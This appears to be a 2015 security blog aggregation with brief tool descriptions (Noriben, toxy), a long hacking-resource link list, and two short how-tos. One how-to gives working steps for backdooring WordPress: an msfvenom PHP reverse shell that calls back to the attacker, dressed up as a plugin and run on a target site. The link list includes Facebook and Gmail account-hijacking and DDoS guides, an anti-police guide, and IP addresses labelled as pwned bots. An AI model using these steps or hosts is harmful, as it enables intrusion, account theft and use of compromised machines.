Aug 6, 2015

Tools: Noriben Malware Analysis Sandbox

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.
Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger.
Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity.

Source:: https://github.com/Rurik/Noriben

Tools: toxy - hackable HTTP proxy

toxy is a hackable HTTP proxy to simulate failure scenarios and unexpected conditions, built for node.js/io.js.
It was mainly designed for fuzz/evil testing purposes, becoming particulary useful to cover fault tolerance and resiliency capabilities of a system, tipically in service-oriented distributed architectures, where toxy may act as intermediate proxy among services.
toxy allows you to plug in poisons, optionally filtered by rules, which basically can intercept and alter the HTTP flow as you want, performing multiple evil actions in the middle of that process, such as limiting the bandwidth, delaying TCP packets, injecting network jitter latency or replying with a custom error or status code.
toxy is compatible with connect/express, and it was built on top of rocky, a full-featured, middleware-oriented HTTP proxy.

Source:: https://github.com/h2non/toxy

Link Resource For Learning Security

 
Testing and learning
-----------------------
http://hack.darkn3ss.com/
 
http://link-base.org/
 
http://ringzer0team.com/
 
http://www.irongeek.com/
 
https://hack.me/
 
http://halls-of-valhalla.org/beta/challenges
 
http://evilzone.org
 
https://evilzone.org/wiki/index.php/The_big_ebook_index
 
http://wecan.hasthe.technology/ <--- fuckin' down, AGAIN
 
http://www.securitytube.net/
 
http://null-byte.wonderhowto.com/how-to/
 
http://n0where.net/
 
http://www.offensive-security.com/metasploit-unleashed
 
http://www.exploit-db.com/
 
https://siph0n.net/
 
http://www.cvedetails.com/
 
http://resources.infosecinstitute.com/
 
http://www.windowsecurity.com/articles-tutorials/
 
http://www.securitysift.com/
 
http://www.sans.org/reading-room/
 
http://packetstormsecurity.com/files/
 
https://www.corelan.be/index.php/articles/
 
http://routerpwn.com/
 
http://opensecuritytraining.info/Training.html
 
https://www.blackhat.com/html/archives.html
 
http://magazine.hitb.org/hitb-magazi
 
http://gcc.godbolt.org/ <--- helpful for learning Assembly
 
http://www.learninghowtohack.com/free-hacker-course/ <--- Sounds like he made it on his mom's computer, some useful information, but most is skid-like bullshit.
 
https://www.vulnhub.com/
 
https://wigle.net/ <--- Find wifi hotspots in your area
 
http://blasze.tk/ <---Honey-pot maker
 
shodanhq.com <-- find computers and servers
 
http://blog.rchapman.org/post/36801038863/linux-system-call-table-for-x86-64
 
https://www.exploit-db.com/google-hacking-database/
 
http://greysec.net/
 
https://www.owasp.org/index.php/Main_Page
 
http://phrack.org/
 
https://www.cs.fsu.edu/~redwood/OffensiveSecurity/lectures.html
 
http://insecure.org/stf/smashstack.html
 
http://securityoverride.org/forum/viewthread.php?thread_id=2672
 
https://ipalyzer.com/ <-- decent recon tool
 
http://pentestmonkey.net/
 
https://wiki.skullsecurity.org/index.php?title=Main_Page
 
https://nets.ec/Main_Page
 
VIRUS/MALWARE
-------------------------------------------
http://www.openrce.org
 
vxheavens.com
 
offensivecomputing.net
 
exploit-db.com
 
inj3ct0r.com
 
WARGAMES
--------------------------------------------
http://overthewire.org/wargames/ <--- great for beginners learning GNU/Linux
 
https://www.pentesterlab.com/
 
http://www.itsecgames.com/
 
https://exploit-exercises.com/
 
http://www.enigmagroup.org/
 
http://smashthestack.org/
 
http://3564020356.org/
 
http://www.hackthissite.org/ <---great community
 
http://www.hackertest.net/
 
PWNED BOTS
============================================================================================================
http://185.12.44.55:8080/tasks
http://45.55.82.110/findi/ <---- port 80 search engine
 
DISTROS
--------------------------------------------------------
https://www.kali.org/
 
http://sourceforge.net/projects/metasploitable/
 
https://tails.boum.org/
 
http://ophcrack.sourceforge.net/
 
 
Recommended VPNs
------------------------
https://www.frootvpn.com/ (doesn't log SHIT, a bit sketchy for free tho)
 
YOUTUBE TALKS
----------------------------------------------------------------------------------------------------------
https://www.youtube.com/watch?v=wynvicPjRDk
https://www.youtube.com/watch?v=35teUHnZNGU
 
Good reads
-----------------------------------------------------------------------------------------------------------
https://security.stackexchange.com/questions/32064/at-what-point-does-something-count-as-security-through-obscurity
 
Hacktorials
--------------------------------------------------------------------------------
How to prepare SQL Injection attack with SQLMap on Kali Linux
http://www.kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html
 
How to hack Wi-Fi using Wifite
http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html
 
How to decect XSS vulnerability attack on any website using XSSER on Kali Linux
https://www.youtube.com/watch?v=Kk39RACyaHc
 
How to prepare SYN Attack using Kali Linux
https://www.youtube.com/watch?v=aJ9syL4S7yE
 
How to prepare DDOS attack on a website using Kali Linux
https://www.youtube.com/watch?v=Tb8sxwQTpN8
 
4 ways to hack Facebook account
http://null-byte.wonderhowto.com/how-to/4-ways-crack-facebook-password-and-protect-yourself-from-them-0139532/
 
4 ways hacking Gmail account
http://www.wikihow.com/Hack-Gmail
 
How to update rules in SNORT
http://openmaniak.com/snort_tutorial_update.php
 
How to hack Facebook account using SE-Toolkit on Kali Linux
https://www.youtube.com/watch?v=EwhpknawB_E
 
How to find information about some using Maltego
https://www.youtube.com/watch?v=XDek66EuYJw
 
How to gather information about someone using Backtrack
https://www.youtube.com/watch?v=RiRFmlzPCIs
 
Gathering information using NMap
https://www.soldierx.com/tutorials/Pentesting-Tutorial-1-Information-Gathering-Part-1-Nmap
 
How to install firewall on Linux machine
http://pastebin.com/ZKXgf8UW
 
How to configure firewall
http://pastebin.com/mSM4beng
 
Videotutorial pokazujacy praktyczne zastosowanie ataku Parameter Delimeter
https://www.youtube.com/watch?v=i8I5jFjxKD4
 
Step-By-Step SQL Injection
https://www.youtube.com/watch?v=7H358PrFagc
 
How to use SQLMap tool
http://pastebin.com/PqXZLseE
 
Tutorial about Search Engine Dorking
http://pastebin.com/Lk67pXJf
 
RFI Tutorial
http://pastebin.com/SsTzxPUv
 
Text tutorial about preparing Man in the Middle attack using Ettercap tool
http://openmaniak.com/ettercap_filter.php
 
How to prepare DDOS attack on a website using Kali Linux
https://www.youtube.com/watch?v=Tb8sxwQTpN8
 
How to decect XSS vulnerability attack on any website using XSSER on Kali Linux
https://www.youtube.com/watch?v=Kk39RACyaHc
 
How to prepare SQL Injection attack with SQLMap on Kali Linux
http://www.kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html
 
Using HPing3 tool in Kali Linux
https://www.youtube.com/watch?v=rtdrEwSBHKk
 
How to use THC-IPv6 toolset
https://www.youtube.com/watch?v=HkmlS40o-yM
 
How to use Ping tool in Linux
http://www.thegeekstuff.com/2009/11/ping-tutorial-13-effective-ping-command-examples/
 
Tutorial about using NMap port scanner
http://nmap.org/bennieston-tutorial/
 
Usage of Brutus AET2
https://dl-web.dropbox.com/get/HackTut/1brutus1.rar?_subject_uid=98829851&w=AACQZykfsnfXcFni34ssVd5KtE6BjbgIYxYTDMNt7GiLiA&dl=1
 
How to sniff passwords using Cain
https://dl-web.dropbox.com/get/HackTut/1cain1.rar?_subject_uid=98829851&w=AABoUZoTcWEypktEvKHyOWMPMyDo-EBkyyI8qwLMZi0Tfg&dl=1
 
Sniffing logins and passwords
https://dl-web.dropbox.com/get/HackTut/1dsniff.rar?_subject_uid=98829851&w=AAAhVYXG1yIxPA5KBPVAwnnv48iEHe3VzoPYebGxNXjnWw&dl=1
 
Graphical view on the network using Etherape
https://www.youtube.com/watch?v=kVyEOqXqWdw
 
Videotutorial that shows how to use NMap on Kali Linux
http://www.youtube.com/watch?v=LxScONd1HmQ
 
How to do ARP Poisoning attack using Ettercap
http://openmaniak.com/ettercap_arp.php
 
How to prepare Man in the Middle attack using Ettercap
http://www.youtube.com/watch?v=Z19p4nDfeG8
 
How to see network usage with Ettercap
http://openmaniak.com/ettercap_stat.php
 
Description of various Network Interfaces
http://openmaniak.com/networking.php
 
Tutorial about Ping tool usage
http://openmaniak.com/ping.php
 
How to prepare SYN Attack using Kali Linux
https://www.youtube.com/watch?v=aJ9syL4S7yE
 
Videotutorial that shows how to hack WPA & WPA2 password using Aircrack-ng software
https://www.youtube.com/watch?v=GLO9HGDwOY0
 
How to crack Wi-Fi protected by WEP using Aircrack-ng
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack
 
How to hack Wi-Fi protected by WPA/WPA2 using Aircrack-ng
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
 
How to prepare EvilTwin attack on Kali Linux
http://www.kalitutorials.net/2014/07/evil-twin-tutorial.html
 
How to crack WEP faster in Kali Linux
http://www.kalitutorials.net/2014/03/speeding-up-wep-hacking.html
 
How to hack WEP protected Wi-Fi with Aircrack-ng
http://www.kalitutorials.net/2013/08/wifi-hacking-wep.html
 
How to hack WPA/WPA2 Wi-Fi protected network using Reaver
http://www.kalitutorials.net/2014/04/hack-wpawpa2-wps-reaver-kali-linux.html
 
How to hack Wi-Fi using Wifite
http://www.kalitutorials.net/2014/04/wifite-hacking-wifi-easy-way-kali-linux.html
 
How ATM can be hacked with just a SMS
http://www.technotification.com/2014/03/windows-xp-flow-atm-being-hacked-by.html
 
Linux Security Secrets and Solutions
https://dl.dropboxusercontent.com/content_link/eClOBdAyKBl1G1eTm8HTC1jhXtikVcfGFkH1uAPS3QrMFuiOtScxTK00gbgFsa1T?dl=1
 
Over 70 recipes to help you master Kali Linux for effective penetration testing
https://dl.dropboxusercontent.com/content_link/IOvaJ93lhCZc82awc3uLrKyFmDVmmurRjDgjm81efBGcxGwvj1uwy2T1eWtrbABC?dl=1
 
Kilka ataków na starsza wersje systemu operacyjnego Windows
http://archsterowniki.ucoz.com/publ/starsze_wersje_windows/ataki_na_windows_95_98/5-1-0-234
 
Czyli jak otworzyc plik .exe myslac ze to .jpg
http://archsterowniki.ucoz.com/publ/hacking/jak_zamienic_exe_na_jpg_binder_exe_to_jpg_ukrywanie_rozszerania_plikow_jak_ukryc_rozszerzenie_pliku_jak_ukryc_rozszerzenia_plikow/11-1-0-118
 
How to reset Windows admin password using Linux :)
http://www.junauza.com/2009/01/hacking-windows-administrator-password.html
 
How to hack Win7 using backdoor on Kali Linux
https://www.youtube.com/watch?v=nBXFqHa8lWA
 
Poradnik pokazuje jak wlamac sie do komputera z systemem windows.
http://www.pcworld.pl/news/356745_2/Jak.wlamac.sie.do.komputera.html
 
How to exploit Windows7 machine using Metasploit
https://www.youtube.com/watch?v=qXLyFGyhElw
 
Some ways to exploit Windows7 & 8 using Backtrack
https://www.youtube.com/watch?v=Kbka0dW5YGI
 
Videotutorial pokazujacy uzycie programu dnsdict6 w celu przeprowadzenia enumeracji DNS
https://www.youtube.com/watch?v=gkrCc-LYEfo
 
How to enumerate DNS using DNSMap on Kali Linux
https://www.youtube.com/watch?v=ieSrHQJ61b8
 
How to crack MD5 hash using Perl script on Kali Linux
https://www.youtube.com/watch?v=zTiwlUP8VjM
 
How to hack remote computer if you know an IP address ;)
https://www.youtube.com/watch?v=XLaEqwFUFLU
 
How to secure hard drive with TrueCrypt
http://pastebin.com/UeWx06wy
 
How to create encrypted hidden volumes in TrueCrypt
http://pastebin.com/DBfSyaun
 
Introduction to Public Key Cryptography
https://developer.mozilla.org/en-US/docs/Introduction_to_Public-Key_Cryptography
 
Film pokazuje jak odkryc numery GG, które maja ustawione dane haslo
https://www.youtube.com/watch?v=01VwgaZbxLI
 
How to admin an IRC channel :)
http://pastebin.com/arksUsJM
 
How to IRC anonymously with XChat+Tor
http://pastebin.com/fxRWS6Cr
 
https://www.youtube.com/watch?v=KLSoyp1-q80
 
Jak zrobic wlasny jezyk programowania bazujac na Rubym. Czesc II - tworzenie jezyka kompilowanego do pseudokodu
https://www.youtube.com/watch?v=_Q3e3eSJom4
 
Jak uzywac wzorca Registry w jezyku PHP
http://pastebin.com/h3VTFQwp
 
How to install VirtualBox on Windows
http://pastebin.com/YpBVDzqn
 
How to install Guest Additions in Virtualbox
http://pastebin.com/Exqh0sFb
 
Tutorial porusza kwestie Bluetooth w androidzie :)
http://andrzejklusiewicz-android.blogspot.com/2014/02/bluetooth-czyli-niebieskie-pogaduszki.html
 
Tutorial porusza podstawy grafiki 2D w androidzie.
http://andrzejklusiewicz-android.blogspot.com/2014/02/podstawowa-grafika-2d.html
 
Kilkanascie hakerskich pojec, które powinien znac kazdy zaczynajacy przygode z hackingiem
http://archsterowniki.ucoz.com/publ/hacking/hacking_podstawy/11-1-0-348
 
How to install Ubuntu
http://pastebin.com/f7Yu542i
 
How to configure Ubuntu
http://pastebin.com/ULbWWLJt
 
Installing Tor for Windows
http://pastebin.com/nqZ93QPG
 
How to clean up traces in Windows
http://pastebin.com/5fA7BvZ1
 
How to shred free space
http://pastebin.com/RfNLq3hf
 
How to secure your computer and surf completely anonymous
http://pastebin.com/PdJH535C
 
How to configure Tor Only Environment
http://pastebin.com/RLiDSaTJ
 
How to protect yourself from police
http://pastebin.com/LQ3PbBLq
 
How to install IRC client on Linux machine
http://pastebin.com/e5hhPF3u
 
How to install Torchat
http://pastebin.com/57T1sZU9
 
How to configure SNORT
http://openmaniak.com/snort_tutorial_snort.php
 
Daily usage of Tor
http://pastebin.com/fJjgaPvz
 
Basic usage of Wireshark
http://openmaniak.com/wireshark_use.php
 
Usage of Wireshark's filters
http://openmaniak.com/wireshark_filters.php
 
How to configure BASE to work with SNORT
http://openmaniak.com/snort_tutorial_base.php
 
Using BleedingSNORT rules in SNORT
http://openmaniak.com/snort_bleeding.php
 
Some things about Port Mirroring in SNORT
http://openmaniak.com/snort_other.php
 
How to use TCPDump tool
http://openmaniak.com/tcpdump.php
 
How to use HarVester tool in Kali Linux
https://www.youtube.com/watch?v=lohGefBjOI8
 
Wyjasnienie znaczenia komunikatów tekstowych w BIOS'ie
http://archsterowniki.ucoz.com/publ/dla_mlodych_informatykow/komunikaty_tekstowe_bios/17-1-0-444
 
How to turn your smartphone into computer webcam
http://www.technotification.com/2014/11/smartphone-as-webcam-you-gotta-be-kidding-me.html
 
Conclusion about Black Hat Style tutorials
http://pastebin.com/h43WBzGy
 
Good linux torrent clients
----------------------------
http://deluge-torrent.org/ <--- been told this is the best torrent client ever to come to Linux, and i have to agree
 
http://www.qbittorrent.org/ <--- i use this, its pretty great
 
Look into Rtorrent as well
 
20 things to do after installing kalinux
---------------------------------------------------
http://www.blackmoreops.com/2014/03/03/20-things-installing-kali-linux/
 
 
Coding challenges and recources that will make you a expert coder
--------------------------------------------------------
https://github.com/karan/Projects
 
http://codingbat.com/
 
http://rosettacode.org/wiki/Category:Programming_Tasks
 
http://www.reddit.com/r/beginnerprojects
 
https://github.com/karan/Projects-Solutions/blob/master/README.md
 
https://www.daniweb.com/software-development/python/threads/131973/5-crucial-projects-for-beginners
 
http://inventwithpython.com/blog/2012/02/20/i-need-practice-programming-49-ideas-for-game-clones-to-code/
 
http://theinternetwishlist.com/
 
http://www.ideamachine.io/
 
http://blog.programmersmotivation.com/2014/07/09/list-projects/
 
How to compile a linux program from source
-------------------------------------------
https://www.youtube.com/watch?v=C7_5zsaQlFE
 
torrent websites
------------------------------------
https://kickass.so/
 
https://oldpiratebay.org/
 
Magnet links to VERRYYY big files with libraries of information
-------------------------------------------------------------------
magnet:?xt=urn:btih:0bbfaaf5f469a2bd3d762f6942a302f7014a35e9&dn=Gentoomen%20Library&tr=udp%3A%2F%2Ftracker.openbittorrent.com%3A80&tr=udp%3A%2F%2Ftracker.publicbt.com%3A80&tr=udp%3A%2F%20%2Ftracker.ccc.de%3A80 (/G/entooman's library, 32 GB of computer information from A-Z, a bit outdated)
 
(75 gig file full of every instruction and guide posted on halfchan /k/, a /k/omando's dream)
magnet:?xt=urn:btih:J3ZVT72VI4MJB5QGET2IKTU6XNRPSJZD&dn=Mega%20Folder&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.publicbt.com%3a80&tr=udp%3a%2f%2ftracker.publicbt.com%3a80%2fannounce&tr=http%3a%2f%2ftracker.best-torrents.net%3a6969%2fannounce&tr=http%3a%2f%2fwww.eddie4.nl%3a6969%2fannounce&tr=udp%3a%2f%2fopen.demonii.com%3a1337&tr=udp%3a%2f%2ftracker.ccc.de%3a80&tr=udp%3a%2f%2ftracker-ccc.de%3a6969&tr=udp%3a%2f%2ffr33domtracker.h33t.com%3a3310%2fannounce&tr=udp%3a%2f%2ftracker.istole.it%3a6969&tr=udp%3a%2f%2ftracker.istole.it%3a80%2fannounce
 
magnet:?xt=urn:btih:c09013f19e37e8aae5465565fd1b266931179c44&dn=The%20Ultimate%20IT%20Ebooks%20Collection%20-%201800%2b%20IT%20and%20Computer%20Science%20Ebooks%20from%20http_%e2%81%84%e2%81%84it-ebooks.info   <--- 1800 IT related
books, some seed it for fucks sake
 
Linux eBooks Collection [PDF]
 
magnet:?xt=urn:btih:807b42a48a011e68e23a8ba4ccdc699057944c16&dn=Linux%20eBooks%20Collection%20%5bPDF%5d
 
Narzew tutorials
--------------------------------------------------------------------------------------------------------------------------------------------
Kali Linux Cookbook
Over 70 recipes to help you master Kali Linux for effective penetration testing
http://hacktut.ugu.pl/?id=17
http://sh.st/udWE4
 
Black Hat Style - Tor Only Environment
How to configure Tor Only Environment
http://hacktut.ugu.pl/?id=41
http://sh.st/ulCL3
 
Hacking Facebook with SET Phishing
How to hack Facebook account using SE-Toolkit on Kali Linux
http://hacktut.ugu.pl/?id=18
http://sh.st/udEmQ
 
Search Engine Dorking
Tutorial about Search Engine Dorking
http://hacktut.ugu.pl/?id=22
http://sh.st/uhRq7
 
Using XChat with Tor
How to IRC anonymously with XChat+Tor
http://hacktut.ugu.pl/?id=44
http://sh.st/ulM5K
 
Ataki na Windows 95/98
Kilka ataków na starszą wersję systemu operacyjnego Windows
http://hacktut.ugu.pl/?id=12
http://sh.st/uaCps
 
Black Hat Style - Tor Daily Usage
Daily usage of Tor
http://hacktut.ugu.pl/?id=40
http://sh.st/ulCKu
 
Black Hat Style - Installing Firewall
How to install firewall on Linux machine
http://hacktut.ugu.pl/?id=32
http://sh.st/ulAsf
 
Hacking Facebook account
4 ways to hack Facebook account
http://hacktut.ugu.pl/?id=6
http://sh.st/uuVvJ
 
Black Hat Style - Installing IRC client on Linux machine
How to install IRC client on Linux machine
http://hacktut.ugu.pl/?id=37
http://sh.st/ulHCG
 
Komunikaty tekstowe BIOS
Wyjaśnienie znaczenia komunikatów tekstowych w BIOS'ie
http://hacktut.ugu.pl/?id=39
http://sh.st/ulKx2
 
SQLMap For Dummies
How to use SQLMap tool
http://hacktut.ugu.pl/?id=21
http://sh.st/uhELL
 
Hacking Linux Exposed - 3rd Edition
Linux Security Secrets and Solutions
http://hacktut.ugu.pl/?id=16
http://sh.st/udWWZ
 
Podstawy hackingu
Kilkanaście hakerskich pojęć, które powinien znać każdy zaczynający przygodę z hackingiem
http://hacktut.ugu.pl/?id=14
http://sh.st/uaCpf
 
Black Hat Style - Firewall Configuration
How to configure firewall
http://hacktut.ugu.pl/?id=33
http://sh.st/ulAgn
 
Hacking remote computer with IP address
How to hack remote computer if you know an IP address ;)
http://hacktut.ugu.pl/?id=19
http://sh.st/udEBi
 
Black Hat Style - Securing Hard Drive
How to secure hard drive with TrueCrypt
http://hacktut.ugu.pl/?id=25
http://sh.st/ukMqL
 
Ping Tutorial
How to use Ping tool in Linux
http://hacktut.ugu.pl/?id=9
http://sh.st/uaov1
 
Własny język programowania cz. 2
Jak zrobić własny język programowania bazując na Rubym. Część II - tworzenie języka kompilowanego do pseudokodu
http://hacktut.ugu.pl/?id=47
http://sh.st/uzqSi
 
Black Hat Style - Shredding Free Space
How to shred free space
http://hacktut.ugu.pl/?id=28
http://sh.st/ukMoF
 
NMap - A Stealth Port Scanner
Tutorial about using NMap port scanner
http://hacktut.ugu.pl/?id=10
http://sh.st/uaov2
 
Black Hat Style - Tor for Windows
Installing Tor for Windows
http://hacktut.ugu.pl/?id=24
http://sh.st/ukXtT
 
Black Hat Style - Installing Torchat
How to install Torchat
http://hacktut.ugu.pl/?id=38
http://sh.st/ulKlf
 
Black Hat Style - How to secure your computer and surf anonymously
How to secure your computer and surf completely anonymous
http://hacktut.ugu.pl/?id=29
http://sh.st/ukMAs
 
Sniffing logins and passwords
Sniffing logins and passwords
http://hacktut.ugu.pl/?id=20
http://sh.st/udRFG
 
Hacking Gmail
4 ways hacking Gmail account
http://hacktut.ugu.pl/?id=8
http://sh.st/uaovM
 
Black Hat Style - Conclusion
Conclusion about Black Hat Style tutorials
http://hacktut.ugu.pl/?id=42
http://sh.st/ulCXW
 
IRC Channel Operator Tutorial
How to admin an IRC channel :)
http://hacktut.ugu.pl/?id=43
http://sh.st/ulM2O
 
Remote File Inclusion
RFI Tutorial
http://hacktut.ugu.pl/?id=23
http://sh.st/ukKaj
 
Black Hat Style - Ubuntu Configuration
How to configure Ubuntu
http://hacktut.ugu.pl/?id=35
http://sh.st/ulFe9
 
Black Hat Style - Setting up TrueCrypt, Encrypted Hidden Volumes
How to create encrypted hidden volumes in TrueCrypt
http://hacktut.ugu.pl/?id=26
http://sh.st/ukMrt
 
Atak Parameter Delimeter w praktyce
Videotutorial pokazujący praktyczne zastosowanie ataku Parameter Delimeter
http://hacktut.ugu.pl/?id=2
http://sh.st/uuDOc
 
Black Hat Style - Installing VirtualBox on Windows
How to install VirtualBox on Windows
http://hacktut.ugu.pl/?id=31
http://sh.st/uk1KZ
 
SQL Injection Step-By-Step
Step-By-Step SQL Injection
http://hacktut.ugu.pl/?id=7
http://sh.st/up5dW
 
DNS Enumeration w praktyce
Videotutorial pokazujący użycie programu dnsdict6 w celu przeprowadzenia enumeracji DNS
http://hacktut.ugu.pl/?id=1
http://sh.st/y3PEm
 
HPing3 Tutorial
Using HPing3 tool in Kali Linux
http://hacktut.ugu.pl/?id=4
http://sh.st/uuLOI
 
Black Hat Style - HD CleanUp Windows
How to clean up traces in Windows
http://hacktut.ugu.pl/?id=27
http://sh.st/ukMtH
 
Reseting Windows Administrator Password
How to reset Windows admin password using Linux :)
http://hacktut.ugu.pl/?id=45
http://sh.st/ulMN4
 
Brutus AET2
Usage of Brutus AET2
http://hacktut.ugu.pl/?id=11
http://sh.st/uaCtE
 
Sniffing Passwords using Cain
How to sniff passwords using Cain
http://hacktut.ugu.pl/?id=15
http://sh.st/uaCRc
 
THC-IPv6 Tutorial
How to use THC-IPv6 toolset
http://hacktut.ugu.pl/?id=5
http://sh.st/uuZLy
 
Black Hat Style - Installing Ubuntu
How to install Ubuntu
http://hacktut.ugu.pl/?id=34
http://sh.st/ulF02
 
DNS Enumeration using DNSMap
How to enumerate DNS using DNSMap on Kali Linux
http://hacktut.ugu.pl/?id=3
http://sh.st/uuKcI
 
Ukrywanie rozszerzeń plików
Czyli jak otworzyć plik .exe myśląć że to .jpg
http://hacktut.ugu.pl/?id=13
http://sh.st/uaCpd
 
Własny język programowania cz. 1
Jak zrobić własny język programowania bazując na Rubym. Część I - tworzenie języka interpretowanego
http://hacktut.ugu.pl/?id=46
http://sh.st/ul9rT
 
Black Hat Style - Installing VirtualBox Guest Additions
How to install Guest Additions in Virtualbox
http://hacktut.ugu.pl/?id=36
http://sh.st/ulFBU
 
Anti-Police Tutorial
How to protect yourself from police
http://hacktut.ugu.pl/?id=30
 
 
 
ONLINE COMPILERS
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://ideone.com/
 
http://codepad.org/
 
 
 
FREE ONLINE EBOOKS
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 
it-ebooks.info <---Dedicated to only IT books; very fast; unlimited downloads.
 
bookzz.org
booksc.org
bookos-z1.org
^All of them are sisters; huge and rapidly increasing resources of everything (at the present nearly 2.5 million books are available); free users are limited to 10 (actually 9 !!) books per day.
 
freescienceengineering.library.elibgen.org <------Another great resource; however most of the books are outdated,be warned!

Aug 3, 2015

Howto: create backdoor in Wordpress

1. Admin access to wordpress

2. Create a php reverse shell using msfvenom and name the file shell.php: msfvenom -p php/meterpreter_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw > shell.php

3. Add comments on the top of the shell.php to make it a valid plugin and compress it in zip format
<?php
/*
*     Plugin Name: My Shell
*     Plugin URI: https://github.com/r0rshark/wordpress-shell
*     Description: Execute Commands as the webserver you are serving wordpress with
*     Author: r0rshark
*     Version: 0.2
*     Author URI: https://r0rshark.github.io
*                             */
 
4. Setup a listener at your ip and port used in the msfvenom
 
5. Execute the reverse shell by visiting www.target.com/wp-content/plugins/shell/shell.php 

Source: https://r0rshark.github.io/2015/07/30/google/

Howto: Use Scalp (web access log analysis)

1. Download Apache-Scalp
https://code.google.com/p/apache-scalp/

2. Download default_filter.xml
https://raw.githubusercontent.com/PHPIDS/PHPIDS/master/lib/IDS/default_filter.xml

3. Use Scalp
# python scalp-0.4.py --log /var/log/nginx/access.log